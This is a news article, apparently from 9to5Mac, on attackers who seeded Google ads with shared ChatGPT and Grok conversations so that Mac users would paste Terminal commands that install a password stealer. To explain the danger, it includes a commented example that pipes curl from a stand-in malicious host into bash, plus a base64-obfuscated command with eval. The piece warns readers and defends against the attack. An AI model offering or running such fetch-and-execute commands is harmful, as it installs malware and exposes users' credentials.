Attackers use ChatGPT to trick Mac users into installing MacStealer

Security researchers have discovered that attackers are using ChatGPT to trick Mac users into pasting command lines into their terminals that install malware. Specifically, it installs MacStealer, which allows attackers to obtain iCloud passwords, files, and credit card details.

The attack targeted people who were searching on Google for ways to free up disk space on their Macs.

Engadget’s Sam Chapman said he was following the growing trend of using AI to find new ways to perform old scams when he came across the report from cybersecurity firm Huntress.

Hackers are apparently using AI prompts to seed Google search results with dangerous commands. When executed by an unsuspecting user, these commands prompt the user to grant the attacker the access needed to install malware.

The attackers had a conversation with ChatGPT in which they introduced the terminal commands, made the chat public, and then paid Google to promote the link. Huntress said this helped the link appear near the top of Google search results for queries about freeing up disk space on a Mac.

The victim was searching for “clear macOS disk space.” Google displayed two highly ranked results at the top of the page. One directed end users to a ChatGPT conversation, and the other to a Grok conversation. Both were hosted on their respective legitimate platforms. Both conversations provided thorough, step-by-step troubleshooting guidance. Both included instructions, with macOS Terminal commands listed as “safe system cleanup” steps.

The user clicked on the ChatGPT link, read the conversation, and executed the provided command. They trusted the results surfaced by the search engine they used every day, delivered through legitimate platforms, and the advice of a trusted AI assistant. Instead, they executed commands that downloaded a variant of the AMOS stealer, silently captured passwords, escalated to root, and deployed persistent malware.
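The attack chain above hinges on a single pasted one-liner that fetches and executes remote code in one step. As a harmless, purely local sketch of that pattern (no network access, nothing malicious):

```shell
# The classic "fetch and execute" shape looks like:
#   curl -fsSL https://malicious.example/install.sh | bash
# The script is never written to disk where the user could read it first.
# A harmless local equivalent of piping text straight into a shell:
script='echo "this could have been anything"'
printf '%s\n' "$script" | bash   # bash executes whatever it is fed, sight unseen
```

The point of the sketch: whatever arrives on the pipe runs immediately with the user's privileges, which is why a command copied from a chat transcript can do far more than its surrounding text claims.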

The attackers did the same with X’s Grok chatbot. The target search keywords were:

  • Free up storage on your Mac
  • Clear macOS disk space
  • How to erase data on your iMac
  • Clear your iMac’s system data

This is a worryingly clever approach, as it bypasses macOS’s built-in protections by having users install the malware themselves, without any warning. It exploits the trust people place in well-known brands like Google and ChatGPT.

9to5Mac’s opinion

Pasting commands into the Terminal without understanding them is a risky practice at the best of times. If you do, you need to be certain that the source is absolutely trustworthy, and Google’s sponsored search results are anything but.
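One reason “read it before you run it” is not always enough: attackers routinely obfuscate payloads so the pasted command reveals nothing to the eye. A harmless demonstration of the idea, using base64 encoding (the encoded string here decodes to a benign `echo`):

```shell
# This opaque string is base64 for the command:  echo "hello"
payload="ZWNobyAiaGVsbG8i"
decoded=$(printf '%s' "$payload" | base64 -d)
echo "$decoded"   # shows the hidden command without running it
# A malicious one-liner would instead run it directly:  eval "$decoded"
```

If a command you are told to paste contains encoded blobs, `curl` piped into `bash`, or anything you cannot read, decode and inspect it first, or simply don’t run it.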

It’s very easy for non-technical users to fall for this, so it’s a good idea to warn your family and friends.
